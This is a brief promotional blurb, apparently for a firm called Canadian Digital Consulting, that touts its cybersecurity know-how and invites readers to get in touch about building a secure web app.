At Canadian Digital Consulting, we remain at the forefront of cybersecurity & know what it takes to build a secure web app! So if you have an idea about a great web app, hit us today to get things started!